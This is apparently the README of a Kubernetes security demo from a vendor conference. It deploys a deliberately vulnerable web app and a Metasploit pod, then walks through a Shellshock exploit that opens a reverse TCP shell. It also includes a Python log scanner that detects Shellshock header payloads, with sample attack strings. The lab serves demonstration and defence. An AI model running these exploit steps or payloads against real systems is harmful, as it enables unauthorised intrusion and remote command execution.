https://github.com/checkpointsw-community/vulnerable-containers

# CPX 2021 demo

* [Requirements](#requirements)
* [Installation](#installation)
* [Demo](#demo)
* [Cleanup](#cleanup)
* [Attacker from external VM](#attacker-from-external-vm)
* [Tips](#tips)

# Requirements

- [Helm3](https://helm.sh/)
- *Highly recommended*: [K9S](https://github.com/derailed/k9s)
- If you want to demo using the hard way: [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/)

# Installation
> Make sure you are using the Helm3 client
```bash
# Install our sushi restaurant web page
helm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi
# Install the attacker client
helm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx
# Ignore the stdout printed by helm
```

# Demo

Run K9S, open the namespace 'vulnerable' and verify that there are 2 pods
running there:

- metasploit-client: We will use this as the "attacker machine"
- vuln-app-cpx-helm-vulnerable: We will use this as the "victim machine"

Verify that the vulnerable namespace has a LoadBalancer service with an
external IP assigned. Write down this value, as we will need it during the
attack phase. This is what makes the application reachable (and attackable)
even from outside the K8S cluster.

Start a shell within the metasploit container and execute:
```bash
cd /usr/src/metasploit-framework
./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml
# The metasploit framework shall start...
```

Using the metasploit framework we will run the apache_mod_cgi_bash_env_exec module (Shellshock) against the vulnerable CGI script:
```bash
search shellshock
# Locate the module with the name apache_mod_cgi_bash_env
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Check available options
show options
# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable
set rhost
# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod
set rport 80
set targeturi /cgi-bin/menu
# Set the payload
set payload linux/x86/shell/reverse_tcp
# Check if target is vulnerable
check
# Exploit vulnerability
exploit
```

At this point you may have multiple sessions opened in background mode. List
them and pick one to interact with the reverse TCP shell:
```bash
# List sessions
sessions
# Run interactive shell in session #1
sessions -i 1
# Start running commands
whoami
ls -la
```
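As an added defender-side example (not part of the demo repository), the following Python scans Apache combined-format access log lines for the Shellshock function-definition prefix `() {` that the exploit above delivers through HTTP request headers such as User-Agent, and flags requests aimed at CGI paths like `/cgi-bin/menu`. The log lines are constructed for illustration.

```python
import re
from typing import Dict, List

# Apache "combined" log format. Quoted fields may contain escaped quotes (\")
# because Apache escapes them when writing the log, so each quoted field is
# matched as "(?:[^"\\]|\\.)*" rather than [^"]*.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Vulnerable bash versions parsed any environment variable whose value began
# with "() {" as a function definition. mod_cgi exports request headers into
# the CGI environment, so the marker can arrive in any header (or the URL).
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def detect_shellshock(lines: List[str]) -> List[Dict]:
    """Return one finding per log line that carries the Shellshock marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess
        hit_fields = [f for f in ("request", "referer", "agent")
                      if SHELLSHOCK_RE.search(m.group(f))]
        if not hit_fields:
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        findings.append({
            "client": m.group("ip"),
            "path": path,
            "fields": hit_fields,
            # A CGI target is where the marker actually reaches bash.
            "cgi_target": path.startswith("/cgi-bin/"),
            "status": int(m.group("status")),
        })
    return findings


# Constructed sample lines: one benign hit on the menu, the public
# "echo vulnerable" test string in User-Agent, the marker in Referer against
# a non-CGI path, and "()" without "{" which must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2021:12:00:01 +0000] "GET /cgi-bin/menu HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Mar/2021:12:00:07 +0000] "GET /cgi-bin/menu HTTP/1.1" 200 0 "-" "() { :;}; /bin/bash -c \\"echo vulnerable\\""',
    '10.0.0.9 - - [10/Mar/2021:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :;}; echo x" "curl/7.68.0"',
    '10.0.0.5 - - [10/Mar/2021:12:00:11 +0000] "GET /cgi-bin/menu?item=() HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in detect_shellshock(SAMPLE_LOG):
        print(finding)
```

Feed it the access log of the sushi web pod (for example via `kubectl logs`) to see the demo's requests surface as findings with `cgi_target` set.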

# Cleanup
```bash
helm uninstall sushi-restaurant -n sushi
helm uninstall attacker-client -n attacker
```
# Attacker from external VM
In order to set up the attacker machine on an external VM running a
distribution like Kali Linux, you will need to assign a public IP address to
this machine so that it is reachable. Additionally, the port on which the
reverse shell connection will be established needs to be allowed for inbound
connections (i.e. in AWS the security group of the EC2 instance needs to allow
inbound connections to that port).

Running the exploit is very similar. First SSH into the Kali Linux machine:
```bash
# Start metasploit console
msfconsole
# Follow the same steps that we already described
# We will need to set a few extra options
set lhost
set lport
# set lport 4444
check
exploit
```

# Tips

- Use the K9S client to demonstrate the attack interactively; it will save
  some time compared to running kubectl commands all the time

*Based on the original demo created [here](https://github.com/chkp-ivanmar/cpx-2021-demo).*